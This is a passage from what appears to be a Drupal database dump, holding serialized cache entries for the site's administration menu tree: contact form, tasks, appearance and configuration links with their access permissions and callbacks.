forms\";}\";s:13:\"page_callback\";s:21:\"contact_category_list\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:23:\"admin/structure/contact\";s:5:\"title\";s:12:\"Contact form\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:71:\"Create a system contact form and set up categories for the form to use.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:3:{i:365;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"365\";s:4:\"plid\";s:3:\"363\";s:9:\"link_path\";s:27:\"admin/structure/contact/add\";s:11:\"router_path\";s:27:\"admin/structure/contact/add\";s:10:\"link_title\";s:12:\"Add category\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"1\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:3:\"363\";s:2:\"p4\";s:3:\"365\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer contact forms\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:44:\"a:1:{i:0;s:26:\"contact_category_edit_form\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:23:\"admin/structure/contact\";s:8:\"tab_root\";s:23:\"admin/structure/contact\";s:5:\"title\";s:12:\"Add category\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"388\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:366;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"366\";s:4:\"plid\";s:3:\"363\";s:9:\"link_path\";s:32:\"admin/structure/contact/delete/%\";s:11:\"router_path\";s:32:\"admin/structure/contact/delete/%\";s:10:\"link_title\";s:14:\"Delete contact\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:3:\"363\";s:2:\"p4\";s:3:\"366\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:30:\"a:1:{i:4;s:12:\"contact_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer contact forms\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:54:\"a:2:{i:0;s:28:\"contact_category_delete_form\";i:1;i:4;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:32:\"admin/structure/contact/delete/%\";s:5:\"title\";s:14:\"Delete contact\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:367;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"367\";s:4:\"plid\";s:3:\"363\";s:9:\"link_path\";s:30:\"admin/structure/contact/edit/%\";s:11:\"router_path\";s:30:\"admin/structure/contact/edit/%\";s:10:\"link_title\";s:21:\"Edit contact category\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:3:\"363\";s:2:\"p4\";s:3:\"367\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:30:\"a:1:{i:4;s:12:\"contact_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer contact forms\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:52:\"a:2:{i:0;s:26:\"contact_category_edit_form\";i:1;i:4;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:30:\"admin/structure/contact/edit/%\";s:5:\"title\";s:21:\"Edit contact category\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}}s:10:\"node_links\";a:0:{}}',0,1423658794,1),('links:management:tree-data:en:e615820bcfe2ec9fffbf4ca8349f270389c0d8290d698680687d233d62b9ba33','a:2:{s:4:\"tree\";a:1:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:10:{i:35;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"35\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:20:\"admin/config/content\";s:11:\"router_path\";s:20:\"admin/config/content\";s:10:\"link_title\";s:17:\"Content authoring\";s:7:\"options\";s:103:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:53:\"Settings related to formatting and authoring content.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"35\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/config/content\";s:5:\"title\";s:17:\"Content authoring\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:53:\"Settings related to formatting and authoring content.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:39;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"39\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:24:\"admin/config/development\";s:11:\"router_path\";s:24:\"admin/config/development\";s:10:\"link_title\";s:11:\"Development\";s:7:\"options\";s:68:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:18:\"Development tools.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"39\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:24:\"admin/config/development\";s:5:\"title\";s:11:\"Development\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:18:\"Development tools.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:46;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"46\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:18:\"admin/config/media\";s:11:\"router_path\";s:18:\"admin/config/media\";s:10:\"link_title\";s:5:\"Media\";s:7:\"options\";s:62:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:12:\"Media tools.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"46\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:18:\"admin/config/media\";s:5:\"title\";s:5:\"Media\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:12:\"Media tools.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:48;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"48\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:19:\"admin/config/people\";s:11:\"router_path\";s:19:\"admin/config/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:74:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:24:\"Configure user accounts.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"48\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/config/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:24:\"Configure user accounts.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:51;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"51\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:21:\"admin/config/regional\";s:11:\"router_path\";s:21:\"admin/config/regional\";s:10:\"link_title\";s:21:\"Regional and language\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Regional settings, localization and translation.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-5\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"51\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/config/regional\";s:5:\"title\";s:21:\"Regional and language\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Regional settings, localization and translation.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:53;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"53\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:19:\"admin/config/search\";s:11:\"router_path\";s:19:\"admin/config/search\";s:10:\"link_title\";s:19:\"Search and metadata\";s:7:\"options\";s:86:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:36:\"Local site search, metadata and SEO.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"53\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/config/search\";s:5:\"title\";s:19:\"Search and metadata\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:36:\"Local site search, metadata and SEO.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:56;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"56\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:19:\"admin/config/system\";s:11:\"router_path\";s:19:\"admin/config/system\";s:10:\"link_title\";s:6:\"System\";s:7:\"options\";s:87:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:37:\"General system related configuration.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"56\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/config/system\";s:5:\"title\";s:6:\"System\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:37:\"General system related configuration.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:61;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"61\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:27:\"admin/config/user-interface\";s:11:\"router_path\";s:27:\"admin/config/user-interface\";s:10:\"link_title\";s:14:\"User interface\";s:7:\"options\";s:88:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:38:\"Tools that enhance the user interface.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"61\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration 